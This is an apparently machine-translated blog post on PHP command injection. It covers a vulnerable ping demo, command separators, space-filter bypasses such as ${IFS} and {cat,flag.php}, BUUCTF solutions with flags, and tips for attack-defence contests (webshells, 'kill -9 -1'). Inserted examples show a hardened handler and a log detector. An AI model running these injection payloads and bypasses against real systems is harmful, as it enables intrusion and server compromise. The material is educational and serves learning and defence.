Command Execution Vulnerability - command execution - vulnerability sites - code injection - vulnerability exploitation - joint execution - bypass (spaces, keyword filtering, variable bypass) - two ex
2022-07-04 02:52:00 【qq_ fifty-one million five hundred and fifty thousand seven hun】
Command execution
Command execution is an attack whose goal is to run arbitrary commands on the host operating system through a vulnerable application. When an application needs to call an external program to process some content, it uses certain functions to execute system commands.
For example, PHP has system, exec, shell_exec and so on. When the user can control the parameters of such a command-execution call, malicious system commands can be injected into the normal command, which results in a command execution attack.
A simple example: suppose you want to create a directory. Instead of creating it in code, a developer who knows the system command mkdir may simply create the directory by calling mkdir as a system command.
Example: cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp is the copy command: it copies sourcefile to the image path.
If the user's input (userinput) is aaa;cat /flag, the command will also read the contents of flag.
Command injection is a common form of vulnerability. Once a command injection vulnerability exists, an attacker can execute arbitrary commands on the target system.
Command injection attacks usually arise from unsafe parameters being passed to programs (command-line arguments, HTTP headers, cookies).
Note: command execution requires that:
1. the program executes a system command;
2. the executed system command (its parameters) is at least controllable (or partially controllable), i.e. the place where the parameter is passed in is a place the user controls.
Command execution inherits the privileges of the web server user. Generally this includes permission to write files, so an attacker can write a webshell, view private information, steal source code and even obtain a reverse shell; the harm is great.
(The user causes the server to execute system commands through the PHP code it runs, hence "command execution inherits the privileges of the web server user".)
On Linux the highest privilege is generally root, while the web server usually runs with the privileges of www-data.
Where the vulnerability lies
1. Code injection: the program's filtering is lax, so users can inject code that gets executed.
High-risk functions:
eval(), assert(), preg_replace(), call_user_func(), etc.
2. Command execution: for functions that execute commands, the parameters are not filtered rigorously, which leads directly to command execution.
High-risk functions:
system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()
Note: backquotes are another name for shell_exec()
e.g. echo `ls`
Code injection
The program's filtering is lax, so users can inject code that gets executed.
High-risk functions:
eval(), assert(), preg_replace(), call_user_func(), etc.
The difference from command execution:
one executes system commands, the other executes PHP code.
Exploit
Take a look at a demo:
<?php
// Vulnerable demo from the post: the ip parameter is taken from GET and
// concatenated into the shell command without any validation.
if (isset($_GET['ip'])){
    $ip = $_GET['ip'];
    echo shell_exec("ping -c 4 " . $ip);   // user input goes straight into the command line
}else{
    highlight_file(__FILE__);              // show the source when no parameter is given
}
Under normal circumstances you enter a host address and the command's output is returned normally.
In the code, the ip parameter is passed in via GET and brought straight into the command, so try appending a separator followed by another command:
127.0.0.1;ls -l
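As an added example (not code from the original post), here is the same ping handler in its vulnerable form beside a hardened form. The function names and the sample inputs are constructed for this example; the hardened version uses PHP's filter_var() with FILTER_VALIDATE_IP as an allowlist and escapeshellarg() to pass the value as a single argument. Run it from the command line: it only prints the command line that would reach the shell instead of executing it.

```php
<?php
// Added example, not the original post's code: the ping handler with the defect the
// post describes, next to a hardened version. Function names are constructed here.

// Vulnerable form: the raw parameter is concatenated into the shell command line,
// so any separator in it (; | && newline ...) starts a second command.
function buildPingCommandUnsafe(string $ip): string
{
    return "ping -c 4 " . $ip;
}

// Hardened form, step 1: only accept something that really is an IP address.
// An allowlist check makes every separator and space-substitute trick irrelevant,
// because none of them survive FILTER_VALIDATE_IP.
function isValidIp(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}

// Hardened form, step 2: even after validation, pass the value as one quoted
// argument. escapeshellarg() wraps it in single quotes and escapes embedded
// quotes, so the shell can never see it as more than a single word.
function buildPingCommandSafe(string $ip): ?string
{
    if (!isValidIp($ip)) {
        return null; // refuse the request rather than try to "clean" the input
    }
    return "ping -c 4 " . escapeshellarg($ip);
}

// Hardened request handler mirroring the demo. In production the returned
// command would be passed to shell_exec(); here it is only displayed.
function handlePingRequest(array $get): string
{
    if (!isset($get['ip'])) {
        return "usage: ?ip=<address>\n";
    }
    $cmd = buildPingCommandSafe($get['ip']);
    if ($cmd === null) {
        return "invalid ip\n";
    }
    return "would run: " . $cmd . "\n";
}

// Constructed inputs: a legitimate address, the post's payload, and two
// variants that use a space substitute and a newline instead of a space.
$samples = ['127.0.0.1', '127.0.0.1;ls -l', '127.0.0.1${IFS}ls', "127.0.0.1\nls"];
foreach ($samples as $s) {
    printf("%-24s unsafe: %-28s safe: %s\n",
        json_encode($s),
        buildPingCommandUnsafe($s),
        buildPingCommandSafe($s) ?? '(rejected)');
}

echo handlePingRequest(['ip' => '127.0.0.1']);
echo handlePingRequest(['ip' => '127.0.0.1;ls -l']);
```

The point to take away is that the hardened handler does not try to strip separators or spaces; it refuses anything that is not an IP address, so the space and separator tricks discussed later in this post have nothing to work with. escapeshellarg() is the second layer in case the validation is ever loosened (for example to allow hostnames).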
Joint execution
Semicolon
cmd1;cmd2;cmd3
cmd1 runs first; regardless of whether cmd1 succeeds or fails, cmd2 runs after it, and when cmd2 completes, cmd3 runs.
The three commands do not affect each other.
&&
Sometimes you want the next command in a Linux command line to run only if the previous command finished successfully. That is where the logical AND operator && comes in.
cmd1 && cmd2 && cmd3
When the first command fails, the && separator stops the following commands from executing.
||
You can also chain commands with the logical OR operator (||), but then the next command runs only if the previous one fails:
cmd1 || cmd2 || cmd3
If cmd1 fails, cmd2 runs. If cmd2 succeeds, cmd3 will not run.
|
The output of the previous command is passed as the input of the next command.
cmd1 | cmd2
For example:
echo xxx | base64
Newline
%0a
%0d
Practice: actf2020 exec on the BUUCTF platform
First try 127.0.0.1
127.0.0.1;ls
;cat /flag
The flag obtained is flag{3e9af367-c215-4a33-9196-4b5314327d9f}
Bypass
Filtering spaces
$IFS
${IFS} // add {} to delimit the variable name from what follows
$IFS$9
< // in Linux, < means input redirection
<>
{cat,flag.php} // the comma takes the role of the space; it must be wrapped in {}
%20
%09
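The separators from the joint execution section and the space substitutes listed above are also exactly what a defender looks for in web-server logs. The following is an added example, not from the original post: a small PHP detector that URL-decodes the query string of each access-log line and reports which indicator matched. The function names, the indicator list and the log lines are all constructed for this example.

```php
<?php
// Added example, not from the original post: a detector for command-injection
// attempts in access logs, covering the separators and space substitutes the post
// lists. Names, patterns and log lines are constructed for this example.

// Indicators a defender would alert on in a query string, after URL-decoding.
// Each entry: human-readable reason => regex.
const INJECTION_INDICATORS = [
    'command separator (; | & or newline)'  => '/[;|&\r\n]/',
    'IFS variable used as a space'          => '/\$\{?IFS\}?/',
    'brace expansion {a,b} used as a space' => '/\{[^}\s]*,[^}\s]*\}/',
    'shell redirection < or >'              => '/[<>]/',
    'backtick or $( ) substitution'         => '/`|\$\(/',
];

// Decode twice so that double-encoded input (%2509 -> %09 -> tab) is caught too.
// urldecode() turns %09 into a tab and %0a into a newline, which the regexes see.
function decodeQuery(string $query): string
{
    return urldecode(urldecode($query));
}

/** Return the list of reasons a query string looks like an injection attempt. */
function findInjectionIndicators(string $query): array
{
    $decoded = decodeQuery($query);
    $hits = [];
    foreach (INJECTION_INDICATORS as $reason => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $reason;
        }
    }
    return $hits;
}

/** Parse a minimal combined-format log line into ['ip' => ..., 'target' => ...]. */
function parseLogLine(string $line): ?array
{
    // Constructed format: IP - - [time] "METHOD /path?query HTTP/1.1" status
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) /', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'target' => $m[2]];
}

/** Scan log lines and return one alert per line that carries an indicator. */
function scanLog(array $lines): array
{
    $alerts = [];
    foreach ($lines as $line) {
        $req = parseLogLine($line);
        if ($req === null) {
            continue;
        }
        $query = parse_url($req['target'], PHP_URL_QUERY) ?? '';
        $hits = findInjectionIndicators($query);
        if ($hits) {
            $alerts[] = ['ip' => $req['ip'], 'query' => $query, 'reasons' => $hits];
        }
    }
    return $alerts;
}

// Constructed sample lines: one benign request, then the post's payloads URL-encoded.
$sampleLog = [
    '10.0.0.5 - - [04/Jul/2022:02:52:00 +0800] "GET /ping.php?ip=127.0.0.1 HTTP/1.1" 200',
    '10.0.0.9 - - [04/Jul/2022:02:52:01 +0800] "GET /ping.php?ip=127.0.0.1;ls%20-l HTTP/1.1" 200',
    '10.0.0.9 - - [04/Jul/2022:02:52:02 +0800] "GET /ping.php?ip=127.0.0.1%0acat$IFS$9/flag HTTP/1.1" 200',
    '10.0.0.9 - - [04/Jul/2022:02:52:03 +0800] "GET /ping.php?ip=127.0.0.1%7C%7B%63%61%74,flag.php%7D HTTP/1.1" 200',
];

foreach (scanLog($sampleLog) as $a) {
    printf("ALERT %s query=%s\n  - %s\n", $a['ip'], $a['query'], implode("\n  - ", $a['reasons']));
}
```

The first line produces no alert; the other three are flagged by the separator rule and additionally by the IFS and brace-expansion rules. Decoding before matching is the important design choice: a rule that looks for a literal space in the raw request misses %09, ${IFS} and {cat,flag.php} entirely, which is the same weakness the space filter in the exercise below has.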
Filtering a keyword
Exercise:
Space filtering
Clearly, a lot of things are filtered:
No error is reported (view the source to get the flag):
flag{0af120ba-cd98-43e9-a099-3f9abac9de96}
Variables
(The GXYCTF problem above is an example solved using variables.)
PS: additional notes
1. In an AWD competition: you cannot delete other people's webshells
www-data and ctf/test do not belong to the same user group
Solution: write a webshell of your own, connect to it with AntSword, and delete the other players' webshells through that webshell.
2. If someone else's webshell writes a new webshell every second, how do you deal with it?
(If the other party's webshell is written through the web page)
Write a webshell of your own, connect to it (your shell then runs as the www-data user), and execute kill -9 -1
If the other party's is (not written through the web):
Then I should execute:
3. Reverse shell
If the IP and port number are known: